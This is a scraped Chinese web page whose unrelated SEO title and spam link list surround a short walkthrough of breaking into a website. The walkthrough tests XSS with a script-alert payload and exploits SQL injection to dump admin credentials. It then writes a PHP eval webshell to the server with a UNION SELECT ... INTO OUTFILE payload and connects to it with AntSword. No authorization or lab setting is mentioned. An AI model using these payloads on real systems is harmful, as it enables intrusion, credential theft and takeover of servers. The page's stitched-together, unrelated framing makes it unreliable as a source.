当前位置: 首页 > news >正文

学校网站建设小组及分工八零云自助建站免费建站平台

学校网站建设小组及分工,八零云自助建站免费建站平台,大学生创新创业大赛ppt,威客类网站开发1.xss漏洞 搜索框输入以下代码&#xff0c;验证是否存在xss漏洞 <script>alert(1)</script> OK了&#xff0c;存在xss漏洞 2.SQL注入 经过测试&#xff0c;输入框存在SQL注入漏洞 查询数据库名 查询管理员账号密码 此处密码为MD5加密&#xff0c;解码内容如下 找…

1.xss漏洞

搜索框输入以下代码,验证是否存在xss漏洞

<script>alert(1)</script>

OK了,存在xss漏洞

2.SQL注入

经过测试,输入框存在SQL注入漏洞

查询数据库名

查询管理员账号密码

 此处密码为MD5加密,解码内容如下

找了半天,没有找到管理员登录界面,所以找到管理员账号和密码没有用,虽然没有,但是证明了一点,那就是此处可以无限制输入命令,并执行,通过扫描目录发现存在phpinfo文件,访问得知网站绝对路径

于是乎,尝试使用sql注入的方式,上传一句话木马

-1' union select 1,"<?php @eval($_POST[cmd]);?>",3 into outfile '/var/www/html/www.php' #

根据设定的地址访问上传的文件 

写入成功,蚁剑连接大脑,cmd代替思考

完事🧐

http://www.shuangfujiaoyu.com/news/29075.html

相关文章:

  • 淘宝 做网站空间 条件广告联盟官网
  • 网站建设沛宣开发网站建设
  • wam和wordpressseo外链优化培训
  • 企业服饰网站模板百度一下你就知道下载
  • 长沙网站制作电话注册一个网站
  • css如何让网站首字放大优化防疫政策
  • 哪个网站开发培训好营销网站方案设计
  • 工信部 网站备案怎么样进行网络推广
  • 上海网站备案注销网站seo优化培训
  • 哈尔滨 网站建设公司品牌策划方案案例
  • 个人网站可以做论坛吗百度邮箱登录入口
  • 淘宝上做网站行吗百度怎么优化网站排名
  • 域名停靠app免费下载网站seo报价单
  • 银川市建设工程质量监督站网站石家庄关键词优化平台
  • 公司网站建设7个基本流程北京百度seo服务
  • table布局网站流量神器
  • 成都开发公司免费seo公司
  • 微信做自己的网站兰州搜索引擎优化
  • 达州做网站的公司企业网络营销
  • 淘宝推广网站建设亚马逊查关键词搜索量的工具
  • 提供网站建设商家想要推广网页
  • 建设部网站资质标准攀枝花seo
  • 政府门户网站建设思路怎么开设自己的网站
  • 自己做网站系统教程百度手机助手app下载
  • 怎么提高网站关键词排名网址大全2345
  • 如何自己做网站模版线上如何做推广
  • 网络维护专业seo建设者
  • 做的最好自考网站是哪个郑州网站网页设计
  • 品牌网站建设有什么作用个人怎么做推广
  • 设计师个人网站怎么做百度置顶广告多少钱